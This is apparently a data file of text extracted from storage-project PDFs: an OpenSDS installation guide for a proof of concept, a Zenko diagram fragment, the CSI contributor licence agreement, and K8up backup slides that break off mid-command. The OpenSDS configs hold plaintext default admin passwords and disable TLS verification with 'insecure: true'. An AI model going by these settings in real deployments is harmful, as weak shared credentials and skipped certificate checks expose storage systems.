19 \n Port matrix used in OpenSDS ......................................................................................... 19 OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 1 1 System requirements 1.1 Hardware The hardware requirements are described in this section. For array-based replication, two physical servers and two Dorado arrays are needed. For host-based replication, two physical servers are needed. For other tests described in this POC, one physical server or one VM can be used for basic testing. 1.2 Software The software requirements are described in this section. \n OS Ubuntu 16.04.3 has been used during the testing and therefore should be used in this POC: root@proxy:~# cat /etc/issue Ubuntu 16.04.3 LTS \\n \\l For user of OS, please use root user to install OpenSDS. For host-based replication, required DRBD software is described in the relevant section later. Other required software is described in the installation section. 2 Installation To test Kubernetes, OpenStack, Host-based or Array-based Replication, this section describes how to install OpenSDS in two host nodes. See the following diagram for a summary of deployment. In the following installation process, we will refer to some of the information in the diagram (such as host name, host IP address, storage IP address, etc.) to express the installation process in more detail. In order to manage storage device, in OpenSDS you only need to configure one of the controllers of storage device if it has two controllers (such as Controller A and B). When you install OpenSDS, please refer to the actual networking. The distributed storage (such as Ceph, OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 2 FusionStorage) has different IP network configuration, please refer to your actual environment. \n 2.1 Prerequisite for two hosts \n Packages Install following packages: apt-get install -y git curl wget libltdl7 libseccomp2 librados2 ceph-common \n Golang You can install golang by executing commands blow: wget https://storage.googleapis.com/golang/go1.11.2.linux-amd64.tar.gz tar -C /usr/local -xzf go1.11.2.linux-amd64.tar.gz echo 'export PATH=$PATH:/usr/local/go/bin' >> /etc/profile echo 'export GOPATH=$HOME/gopath' >> /etc/profile mkdir –p ~/gopath source /etc/profile Check golang version information: root@proxy:~# go version go version go1.11.2 linux/amd64 \nOpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 3 \n Docker Install docker: # Download and install docker ce 18.03 wget https://download.docker.com/linux/ubuntu/dists/xenial/pool/stable/amd64/docker-ce_18.03.1~ce-0~ubuntu_amd64.deb dpkg -i docker-ce_18.03.1~ce-0~ubuntu_amd64.deb Version information: root@opensds-primary:~# docker version Client: Version: 18.03.1-ce API version: 1.37 Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:17:20 2018 OS/Arch: linux/amd64 Experimental: false Orchestrator: swarm Server: Engine: Version: 18.03.1-ce API version: 1.37 (minimum version 1.12) Go version: go1.9.5 Git commit: 9ee9f40 Built: Thu Apr 26 07:15:30 2018 OS/Arch: linux/amd64 Experimental: false \n Docker-compose Install docker-compose: curl -L \"https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)\" -o /usr/local/bin/docker-compose chmod +x /usr/local/bin/docker-compose Version information: docker-compose version docker-compose version 1.23.1, build b02f1306 docker-py version: 3.5.0 CPython version: 3.6.7 OpenSSL version: OpenSSL 1.1.0f 25 May 2017 \n Ansible To install ansible, run the commands below: add-apt-repository ppa:ansible/ansible-2.4 apt-get update OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 4 apt-get install -y ansible # Check ansible version, 2.4.x is required. ansible --version \n DRBD Run command blow to install drbd service: add-apt-repository ppa:linbit/linbit-drbd9-stack apt-get update apt-get install drbd-utils python-drbdmanage drbd-dkms Check verion information: drbdmanage --version drbdmanage 0.99.18; GIT-hash: 2bca8c7874462285e1b499c662e52a66f3844403 2.2 Deployment on host 1 \n OpenSDS Deployment In this section, the steps to deploy an OpenSDS local cluster are described. 2.2.1.1 Download opensds-installer code cd $HOME git clone -b stable/bali https://github.com/opensds/opensds-installer.git cd opensds-installer/ansible 2.2.1.2 Configure OpenSDS cluster variables 2.2.1.2.1 System environment Change host_ip to the actual IP address (e.g. 192.168.2.2) in group_vars/common.yml: # This field indicates local machine host ip host_ip: 127.0.0.1 Modify the host and port of etcd in group_vars/osdsdb.yml. To eliminate the conflict with kubernetes, you should change the etc_host to actual IP address (e.g. 192.168.2.2) and change etcd_port and etcd_peer_port to new ports, such as 2479 and 2480. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 5 etcd_host: 192.168.2.2 etcd_port: 2479 etcd_peer_port: 2480 2.2.1.2.2 LVM If lvm is chosen as the storage backend, there is no need to modify group_vars/osdsdock.yml because it is the default choice: enabled_backend: lvm # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' Change tgtBindIp variable in group_vars/lvm/lvm.yaml to your real host IP address (e.g. 192.168.2.2): tgtBindIp: 127.0.0.1 # change tgtBindIp to your real host ip, run 'ifconfig' to check 2.2.1.2.3 Ceph If ceph is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: ceph # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder'. Configure group_vars/ceph/all.yml with an example below: ceph_origin: repository ceph_repository: community ceph_stable_release: luminous # Choose luminous as default version public_network: \"192.168.3.0/24\" # Run 'ip -4 address' to check the ip address cluster_network: \"{{ public_network }}\" monitor_interface: eth1 # Change to the network interface on the target machine devices: # For ceph devices, append ONE or MULTIPLE devices like the example below: - '/dev/sda' # Ensure this device exists and available if ceph is chosen #- '/dev/sdb' # Ensure this device exists and available if ceph is chosen osd_scenario: collocated 2.2.1.2.4 Cinder If cinder is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: cinder # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' # Use block-box install cinder_standalone if true, see details in: use_cinder_standalone: true Configure the auth and pool options to access cinder in group_vars/cinder/cinder.yaml. Do not need to make additional configure changes if using cinder standalone. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 6 2.2.1.3 Check if the hosts can be reached ansible all -m ping -i local.hosts 2.2.1.4 Run opensds-ansible playbook to start deploy ansible-playbook site.yml -i local.hosts \n Configure FusionStorage Backend FusionStorage installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using FusionStorage as the backend, you should configure it manually. 1. Add FusionStorage backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_fusionstorage # ... [huawei_fusionstorage] name = fusionstorage backend description = This is a fusionstorage backend service driver_name = huawei_fusionstorage config_path = /etc/opensds/driver/fusionstorage.yaml 2. Add FusionStorage backend configuration to /etc/opensds/driver/dorado.yaml, please confirm whether the fmIp and fsaIp are correct. authOptions: fmIp: 192.168.3.4 fsaIp: - 192.168.3.4 pool: 0: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 7 ioConnectivity: accessProtocol: DSWARE maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 3ms 3. After configuring, restart the osdsdock. # Check osdsdock ps -ef | grep osdsdock # If it exists, kill all and restart killall osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --daemon # Check osdsdock if it exists. ps -ef | grep osdsdock \n Configure Dorado Storage Backend Dorado installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using dorado as the backend, you should configure it manually. 4. Add dorado backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_dorado host_based_replication_driver = drbd # ... [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml # OpenSDS will support array-based replication when support_replication = true, # OpenSDS will support host-based replication when support_replication = false support_replication = true OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 8 5. Add dorado backend configuration to /etc/opensds/driver/dorado.yaml authOptions: endpoints: \"https://196.168.3.4:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true replication: authOptions: endpoints: \"https://196.168.3.5:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true pool: # Dorado pool that you want to provide to opensds. StoragePool001: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 # The ETH ip that you configure in for iSCSI. targetIp: 193.151.3.4 If you want change the storage networking protcol to FC, please replace the iscsi with fibre_channel. 6. After configuring, restart the osdsdock. # Check osdsdock ps -ef | grep osdsdock # If it exists, kill all and restart killall osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --daemon # Check osdsdock if it exists. ps -ef | grep osdsdock OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 9 \n Configure Host-based replication Currently, OpenSDS can only support one type of replication at a time, therefore if you want to test host-based replication please confirm the parameter 'support_replication' is false, as described in Section 2.2.2. We recommend that you configure and test host-based replication after testing array-based replication. 1. Add drbd configuration for opensds drbd driver. vi /etc/opensds/drbd.yaml #Minumum and Maximum TCP/IP ports used for DRBD replication PortMin: 7000 PortMax: 8000 #Exactly two hosts between resources are replicated. #Never ever change the Node-ID associated with a Host(name) Hosts: - Hostname: opensds-secondary # hostname of host 2 IP: 192.168.2.3 Node-ID: 1 - Hostname: opensds-primary # hostname of host 1 IP: 192.168.2.2 Node-ID: 0 2. Add /etc/opensds/attacher.conf [osdsdock] api_endpoint = 192.168.2.2:50051 log_file = /var/log/opensds/osdsdock.log bind_ip = 192.168.2.2 dock_type = attacher [database] endpoint = 192.168.2.2:2479, 192.168.2.2:2480 driver = etcd 3. Startup the osdsdock(attacher) # Start attacher osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --config-file /etc/opensds/attacher.conf --daemon # Check attacher osdsdock ps -ef | grep osdsdock OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 10 \n Kubernetes Local Cluster Deployment 2.2.5.1 Install Etcd You can install etcd by executing commands blow: cd $HOME wget https://github.com/coreos/etcd/releases/download/v3.3.0/etcd-v3.3.0-linux-amd64.tar.gz tar -xzf etcd-v3.3.0-linux-amd64.tar.gz cd etcd-v3.3.0-linux-amd64 sudo cp -f etcd etcdctl /usr/local/bin/ 2.2.5.2 kubernetes local cluster You can start the latest k8s local cluster by executing commands blow: cd $HOME git clone https://github.com/kubernetes/kubernetes.git cd $HOME/kubernetes git checkout v1.13.0 make echo alias kubectl='$HOME/kubernetes/cluster/kubectl.sh' >> /etc/profile ALLOW_PRIVILEGED=true FEATURE_GATES=CSIPersistentVolume=true,MountPropagation=true,VolumeSnapshotDataSource=true,KubeletPluginsWatcher=true RUNTIME_CONFIG=\"storage.k8s.io/v1alpha1=true\" LOG_LEVEL=5 hack/local-up-cluster.sh \n CSI Plugin Deployment 2.2.6.1 Download nbp source code git clone -b stable/bali https://github.com/opensds/nbp.git cd nbp 2.2.6.2 Configure CSI Plugin configmap Configure OpenSDS endpoint and Keystone IP address. vi csi/server/deploy/kubernetes/csi-configmap-opensdsplugin.yaml The IP (127.0.0.1) should be replaced with the opensds and identity actual endpoint IP (e.g. 192.168.2.2). kind: ConfigMap apiVersion: v1 metadata: name: csi-configmap-opensdsplugin data: opensdsendpoint: http://127.0.0.1:50040 osauthurl: http://127.0.0.1/identity OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 11 2.2.6.3 Install CSI Plugin Use kubectl command to create OpenSDS CSI pods: kubectl create -f csi/server/deploy/kubernetes After this, three pods can be found by kubectl get pods like below: • csi-provisioner-opensdsplugin • csi-attacher-opensdsplugin • csi-nodeplugin-opensdsplugin • csi-snapshotter-opensdsplugin 2.3 Deployment on host 2 \n OpenSDS Deployment In this section, the steps to deploy an OpenSDS local cluster are described. 2.3.1.1 Download opensds-installer code cd $HOME git clone -b stable/bali https://github.com/opensds/opensds-installer.git cd opensds-installer/ansible 2.3.1.2 Configure OpenSDS cluster variables 2.3.1.2.1 System environment Change host_ip to the actual IP address (e.g. 192.168.2.3) in group_vars/common.yml: # This field indicates local machine host ip host_ip: 127.0.0.1 Then, set opensds_auth_strategy as noauth in group_vars/auth.yml # OpenSDS authentication strategy, support 'noauth' and 'keystone'. opensds_auth_strategy: noauth Modify the host and port of etcd in group_vars/osdsdb.yml. To eliminate the conflict with kubernetes, you should change the etc_host to actual IP address of Host 1 (e.g. 192.168.2.2) and change etcd_port and etcd_peer_port to new ports, such as 2479 and 2480. etcd_host: 192.168.2.2 etcd_port: 2479 OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 12 etcd_peer_port: 2480 2.3.1.2.2 LVM If lvm is chosen as the storage backend, there is no need to modify group_vars/osdsdock.yml because it is the default choice: enabled_backend: lvm # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' Change tgtBindIp variable in group_vars/lvm/lvm.yaml to your real host IP address (e.g. 192.168.2.3): tgtBindIp: 127.0.0.1 # change tgtBindIp to your real host ip, run 'ifconfig' to check 2.3.1.2.3 Ceph If ceph is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: ceph # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder'. Configure group_vars/ceph/all.yml with an example below: ceph_origin: repository ceph_repository: community ceph_stable_release: luminous # Choose luminous as default version public_network: \"192.168.3.0/24\" # Run 'ip -4 address' to check the ip address cluster_network: \"{{ public_network }}\" monitor_interface: eth1 # Change to the network interface on the target machine devices: # For ceph devices, append ONE or MULTIPLE devices like the example below: - '/dev/sda' # Ensure this device exists and available if ceph is chosen #- '/dev/sdb' # Ensure this device exists and available if ceph is chosen osd_scenario: collocated 2.3.1.2.4 Cinder If cinder is chosen as storage backend, modify group_vars/osdsdock.yml: enabled_backend: cinder # Change it according to the chosen backend. Supported backends include 'lvm', 'ceph', and 'cinder' # Use block-box install cinder_standalone if true, see details in: use_cinder_standalone: true Configure the auth and pool options to access cinder in group_vars/cinder/cinder.yaml. Do not need to make additional configure changes if using cinder standalone. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 13 2.3.1.3 Check if the hosts can be reached ansible all -m ping -i local.hosts 2.3.1.4 Run opensds-ansible playbook to start deploy ansible-playbook site.yml -i local.hosts \n Configure FusionStorage Backend FusionStorage installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using FusionStorage as the backend, you should configure it manually. 1. Add FusionStorage backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_fusionstorage # ... [huawei_fusionstorage] name = fusionstorage backend description = This is a fusionstorage backend service driver_name = huawei_fusionstorage config_path = /etc/opensds/driver/fusionstorage.yaml 2. Add FusionStorage backend configuration to /etc/opensds/driver/dorado.yaml, please confirm whether the fmIp and fsaIp are correct. authOptions: fmIp: 192.168.3.5 fsaIp: - 192.168.3.5 pool: 0: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 14 ioConnectivity: accessProtocol: DSWARE maxIOPS: 7000000 maxBWS: 600 advanced: diskType: SSD latency: 3ms \n Configure Dorado Storage Backend Dorado installation has not been integrated into the opensds-installer yet, if you want to test the OpenSDS using dorado as the backend, you should configure it manually. 1. Add dorado backend configuration to /etc/opensds/opensds.conf vim /etc/opends/opensds.conf [osdsdock] # ... enabled_backends = huawei_dorado host_based_replication_driver = drbd # ... [huawei_dorado] name = huawei_dorado description = Huawei OceanStor Dorado driver_name = huawei_dorado config_path = /etc/opensds/driver/dorado.yaml # OpenSDS will support array-based replication when support_replication = true, # OpenSDS will support host-based replication when support_replication = false support_replication = true 2. Add dorado backend configuration to /etc/opensds/driver/dorado.yaml authOptions: endpoints: \"https://196.168.3.5:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true replication: authOptions: endpoints: \"https://196.168.3.4:8088/deviceManager/rest\" username: \"admin\" password: \"Huawei12#$\" insecure: true OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 15 pool: # Dorado pool that you want to provide to opensds. StoragePool001: storageType: block availabilityZone: default extras: dataStorage: provisioningPolicy: Thin isSpaceEfficient: false ioConnectivity: accessProtocol: iscsi maxIOPS: 7000000 maxBWS: 600 # The ETH ip that you configure in for iSCSI. targetIp: 193.151.3.5 If you want change the storage networking protcol to FC, please replace the iscsi with fibre_channel. 3. After configuring, restart the osdsdock. # Check osdsdock ps -ef | grep osdsdock # If it exists, kill all and restart killall osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --daemon # Check osdsdock if it exists. ps -ef | grep osdsdock \n Configure Host-based replication Currently, OpenSDS can only support one type of replication at a time, therefore if you want to test host-based replication please confirm the parameter 'support_replication' is false, as described in Section 2.3.2. We recommend that you configure and test host-based replication after testing array-based replication. 1. Add drbd configuration for opensds drbd driver. vi /etc/opensds/drbd.yaml #Minumum and Maximum TCP/IP ports used for DRBD replication PortMin: 7000 PortMax: 8000 #Exactly two hosts between resources are replicated. OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 16 #Never ever change the Node-ID associated with a Host(name) Hosts: - Hostname: opensds-secondary # hostname of host 2 IP: 192.168.2.3 Node-ID: 1 - Hostname: opensds-primary # hostname of host 1 IP: 192.168.2.2 Node-ID: 0 2. Add /etc/opensds/attacher.conf [osdsdock] api_endpoint = 192.168.2.3:50051 log_file = /var/log/opensds/osdsdock.log bind_ip = 192.168.2.3 dock_type = attacher [database] endpoint = 192.168.2.2:2479, 192.168.2.2:2480 driver = etcd 3. Startup the osdsdock(attacher) # Start attacher osdsdock /opt/opensds-hotpot-linux-amd64/bin/osdsdock --config-file /etc/opensds/attacher.conf --daemon # Check attacher osdsdock ps -ef | grep osdsdock \n Devstack(Openstack) Deployment 2.3.5.1 Install OpenStack using devstack The Cinder Compatible API only supports cinder's current Api(v3). You can use devstack to install cinder when testing, but in order to use cinder's current Api(v3), branch for devstack must be stable/queens. You can reference this document to install devstack(OpenStack). https://docs.openstack.org/devstack/latest/ OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 17 \n Configure Cinder Compatible API in OpenSDS Cinder Compatible API adapter is not built in as part of the ansible deployment tool. Please confirm that OS user is root, not stack. Follow the following instruction to install it. 2.3.6.1 Installation 1. Initialize OpenStack environment variables. source /opt/stack/devstack/openrc admin admin export OS_VOLUME_API_VERSION=3 2. Change the \"cinderv3\" endpoint so that OpenStack can access the cinder compatible api. Then export OPENSDS_ENDPOINT and CINDER_ENDPOINT. # Find the <endpoint-id> of cinderv3 openstack endpoint list # Update cinderv3 endpoint, the ip is the actual ip address of host2 openstack endpoint set <endpoint-id> --url ‘http:// 192.168.2.3:8777/v3/$(project_id)s’ # Export OPENSDS_ENDPOINT and CINDER_ENDPOINT export OPENSDS_ENDPOINT=http://192.168.2.3:50040 export CINDER_ENDPOINT=http://192.168.2.3:8777/v3 3. Compatible api code, build and run it. cd $GOPATH/src/github.com/opensds/opensds # Building go build -o ./build/out/bin/cindercompatibleapi github.com/opensds/opensds/contrib/cindercompatibleapi # Run cinder compatible api service setsid ./build/out/bin/cindercompatibleapi 4. Check cinder compatible api. cinder type-list OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 18 2.4 Check OpenSDS \n Check OpenSDS CLI Tool Configure OpenSDS CLI tool on host 1: cp /opt/opensds-hotpot-linux-amd64/bin/osdsctl /usr/local/bin export OPENSDS_ENDPOINT=http://{your_real_host_ip}:50040 export OPENSDS_AUTH_STRATEGY=keystone source /opt/stack/devstack/openrc admin admin osdsctl pool list # Check if the pool resource is available Create a default profile: osdsctl profile create '{\"name\": \"default\", \"description\": \"default policy\"}' Create a volume: osdsctl volume create 1 --name=test-001 List all volumes: osdsctl volume list Delete the volume: osdsctl volume delete <your_volume_id> \n Check OpenSDS Dashboard OpenSDS UI dashboard is available at http://{your_host1_ip}:8088 on host1, please login the dashboard using the default admin credentials: admin/opensds@123. Create tenant, user, and profiles as admin. Multi-Cloud service is also supported by dashboard. Logout of the dashboard as admin and login the dashboard again as a non-admin user to manage storage resource: • Volume Service • Create volume • Create snapshot • Expand volume size • Create volume from snapshot • Create volume group Multi Cloud Service OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 19 • Register object storage backend • Create bucket • Upload object • Download object • Migrate objects based on bucket across cloud 3 Uninstallation Log in to the two hosts, respectively, do the following steps: Run opensds-ansible playbook to clean the environment. cd opensds-installer/ansible ansible-playbook clean.yml -i local.hosts Run ceph-ansible playbook to clean ceph cluster if ceph is deployed (optional). cd /opt/ceph-ansible sudo ansible-playbook infrastructure-playbooks/purge-cluster.yml -i ceph.hosts In addition, clean up the logical partition on the physical block device used by ceph, using the fdisk tool. And remove ceph-ansible source code (optional). sudo rm -rf /opt/ceph-ansible 4 Appendix \n Port matrix used in OpenSDS Port Service Description config file 50040 osdslet API server default port number path: opensds-installer/ansible/group_vars/hotpot.yml item: controller_endpoint: \"{{ host_ip }}:50040\" OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 20 50050 osdsdock Osdsdock grpc default port nubmer path: opensds-installer/ansible/group_vars/hotpot.yml item: dock_endpoint: localhost:50050 2379 etcd ETCD port path: opensds-installer/ansible/group_vars/osdsdb.yml item: etcd_port: 2379 2380 etcd ETCD port path: opensds-installer/ansible/group_vars/osdsdb.yml item: etcd_peer_port: 2380 8088 dashbord Dashbord service port using nginx Not support 80 keystone Keystone service port using apache Not support 11211 memcache Memcache service which is used by keystone. Not support 3306 mysql Memcache service which is used by keystone. Not support 3260 iscsi-target If you use lvm as the Not support OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 21 storage backend, iscsi-target will be used to providing volume to host. 8089 multi-cloud-api Mult-Cloud API server default port number Not support \n27017 mongodb Mongodb port nubmer which is used by multi-cloud Not support \n9092 kafka Kafka port nubmer which is used by multi-cloud Not support \n2181 zookeeper zookeeper port nubmer which is used by kafka Not support OpenSDS DATE: 01/24/19 \nOpenSDS DRAFT 22 8776 cinder Cinder API service port number Not support 5672 rabbitmq Rabbitmq service port number which is used by cinder Not support 8080 ceph radosgw Ceph radosgw civetweb port path: opensds-installer/ansible/group_vars/ceph/all.yml item: radosgw_civetweb_port: 8080 6789 ceph mon Ceph monitor services Not support 6800:7300 ceoh osd Ceph OSD services bind to ports within the 6800:7300 range Not support " } ]
{ "category": "Runtime", "file_name": "Cosmos.pdf", "project_name": "Zenko", "subcategory": "Cloud Native Storage" }
[ { "data": "CloudServer\nCosmos\nNFS\nor\nSMB/CIFS\nREST\nS3" } ]
{ "category": "Runtime", "file_name": "CCLA.pdf", "project_name": "Container Storage Interface (CSI)", "subcategory": "Cloud Native Storage" }
[ { "data": " Container Storage Interface Software Grant and Corporate Contributor License Agreement (“Agreement”) v1.0 This Corporate Contributor License Agreement allows an entity (the \"Corporation\") to submit Contributions to the signatory parties (“CSI Project Maintainers”) of the Letter of Intent: CSI Project, dated February 28, 2018 (“Letter”), to authorize Contributions submitted by its designated employees to the CSI Project Maintainers, and to grant copyright and patent licenses thereto. Corporation name: ________________________________________________ Corporation address: ________________________________________________ ________________________________________________ ________________________________________________ Point of Contact: ________________________________________________ E-Mail: ________________________________________________ Telephone: _____________________ Fax: _____________________ You accept and agree to the following terms and conditions for Your present and future Contributions submitted to the CSI Project Maintainers. Except for the license granted herein to the CSI Project Maintainers and recipients of software distributed by the CSI Project Maintainers, You reserve all right, title, and interest in and to Your Contributions. 1. Definitions. \"You\" (or \"Your\") shall mean the copyright owner or legal entity authorized by the copyright owner that is making this Agreement with the CSI Project Maintainers. For legal entities, the entity making a Contribution and all other entities that control, are controlled by, or are under common control with that entity are considered to be a single Contributor. For the purposes of this definition, \"control\" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity. \"Contribution\" shall mean any original work of authorship, including any modifications or additions to an existing work, that is intentionally submitted by You to the CSI Project Maintainers for inclusion in, or documentation of the CSI Project (as described in the Letter) managed by the CSI Project Maintainers (the \"Work\"). For the purposes of this definition, \"submitted\" means any form of electronic, verbal, or written communication sent to the CSI Project Maintainers or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the CSI Project Maintainers for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by You as \"Not a Contribution.\" 2. Grant of Copyright License. Subject to the terms and conditions of this Agreement, You hereby grant to the CSI Project Maintainers and to recipients of software distributed by the CSI Project Maintainers a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare derivative works of, publicly display, publicly perform, sublicense, and distribute Your Contributions and such derivative works. 3. Grant of Patent License. Subject to the terms and conditions of this Agreement, You hereby grant to the CSI Project Maintainers and to recipients of software distributed by the CSI Project Maintainers a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by You that are necessarily infringed by Your Contribution(s) alone or by combination of Your Contribution(s) with the Work to which such Contribution(s) were submitted. If any entity institutes patent litigation against You or any other entity (including a cross-claim or counterclaim in a lawsuit) alleging that your Contribution, or the Work to which you have contributed, constitutes direct or contributory patent infringement, then any patent licenses granted to that entity under this Agreement for that Contribution or Work shall terminate as of the date such litigation is filed. 4. You represent that You are legally entitled to grant the above license. You represent further that each employee of the Corporation designated on Schedule A below (or in a subsequent written modification to that Schedule) is authorized to submit Contributions on behalf of the Corporation. 5. You represent that each of Your Contributions is Your original creation (see section 7 for submissions on behalf of others). 6. You are not expected to provide support for Your Contributions, except to the extent You desire to provide support. You may provide support for free, for a fee, or not at all. Unless required by applicable law or agreed to in writing, You provide Your Contributions on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. 7. Should You wish to submit work that is not Your original creation, You may submit it to the CSI Project Maintainers separately from any Contribution, identifying the complete details of its source and of any license or other restriction (including, but not limited to, related patents, trademarks, and license agreements) of which you are personally aware, and conspicuously marking the work as \"Submitted on behalf of a third-party: [named here]\". 8. It is your responsibility to notify the CSI Project Maintainers when any change is required to the list of designated employees authorized to submit Contributions on behalf of the Corporation, or to the Corporation's Point of Contact with the CSI Project Maintainers. Please sign: __________________________________ Date: _______________ Title: __________________________________ Corporation: __________________________________ Schedule A [Initial list of designated employees. NB: authorization is not tied to particular Contributions.] " } ]
{ "category": "Runtime", "file_name": "slides.pdf", "project_name": "K8up", "subcategory": "Cloud Native Storage" }
[ { "data": "VSHN – The DevOps Company         \nAdrian Kosmaczewski, Developer RelationsIntroduction to K8up\nFebruary 23rd, 2023\n1VSHN – The DevOps Company  2VSHN – The DevOps Company  Répétez avec moi: /keɪtæpp/\n3VSHN – The DevOps Company  4VSHN – The DevOps Company  Backup as a ServiceBaaS\n5VSHN – The DevOps Company  A Backup Operator for Kubernetes & OpenShift\nUsed internally at VSHN since 2018\nUses under the hood\nCurrent version: 2.5.3 (February 17th, 2023)\nk8up.io and github.com/k8up-ioWhat is K8up?\nrestic\n6VSHN – The DevOps Company  K8up is a CNCF Sandbox project since November 2021\n7VSHN – The DevOps Company  Any S3-compatible backend\nAny restic-compatible backendWhere does it store backups?\n8VSHN – The DevOps Company  K8up backs all PVCs in the same namespace\n1. Create backup credentials\n2. Trigger a backup or set up a backup schedule\n3. No step 3!How does it work?\n9VSHN – The DevOps Company  1Annotation required for K8up1. PVC Resource\nkind: PersistentVolumeClaim \napiVersion: v1 \nmetadata: \n name: app-data \n labels: \n app.kubernetes.io/name: demo-app \n annotations: \n k8up.io/backup: \"true\" \nspec: \n accessModes: \n - ReadWriteOnce \n resources: \n requests: \n storage: \"1Gi\"1\n10VSHN – The DevOps Company  1A really secure password!2. Backup Credentials\napiVersion: v1 \nkind: Secret \nmetadata: \n name: backup-repo \ntype: Opaque \nstringData: \n password: p@ssw0rd 1\n11VSHN – The DevOps Company  1A backup every minute!apiVersion: k8up.io/v1 \nkind: Schedule \nmetadata: \n name: schedule-test \nspec: \n failedJobsHistoryLimit: 2 \n successfulJobsHistoryLimit: 2 \n backend: \n repoPasswordSecretRef: \n name: backup-repo \n key: password \n s3: \n endpoint: https://sos-ch-gva-2.exo.io \n bucket: my-bucket-change-name \n accessKeyIDSecretRef: \n name: objectbucket-creds \n key: AWS_ACCESS_KEY_ID \n secretAccessKeySecretRef: \n name: objectbucket-creds \n key: AWS_SECRET_ACCESS_KEY \n backup: \n schedule: '*/1 * * * *' \n failedJobsHistoryLimit: 2 \n successfulJobsHistoryLimit: 21\n12VSHN – The DevOps Company  Backend Object\n backend: \n repoPasswordSecretRef: \n name: backup-repo \n key: password \n s3: \n endpoint: https://sos-ch-gva-2.exo.io \n bucket: my-bucket-change-name \n accessKeyIDSecretRef: \n name: objectbucket-creds \n key: AWS_ACCESS_KEY_ID \n secretAccessKeySecretRef: \n name: objectbucket-creds \n key: AWS_SECRET_ACCESS_KEY\n13VSHN – The DevOps Company  \nt w i t t e r . c o m / n i x c r a f t / s t a t u s / 6 1 3 6 3 6 5 2 8 4 3 9 3 4 5 1 5 2\n14VSHN – The DevOps Company  1PVC where the restoration takes placeRestore\napiVersion: k8up.io/v1 \nkind: Restore \nmetadata: \n name: restore-wordpress \nspec: \n snapshot: SNAPSHOT_ID \n restoreMethod: \n folder: \n claimName: wordpress-pvc \n backend: \n repoPasswordSecretRef: \n name: backup-repo \n key: password \n s3: \n endpoint: https://sos-ch-gva-2.exo.io \n bucket: my-bucket-change-name \n accessKeyIDSecretRef: \n name: objectbucket-creds \n key: AWS_ACCESS_KEY_ID \n secretAccessKeySecretRef: \n name: objectbucket-creds \n key: AWS_SECRET_ACCESS_KEY1\n15VSHN – The DevOps Company  Manual Restore via restic\n$ export RESTIC_REPOSITORY=s3:http://location/of/the/backup \n$ export RESTIC_PASSWORD=p@assword \n$ export AWS_ACCESS_KEY_ID=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX \n$ export 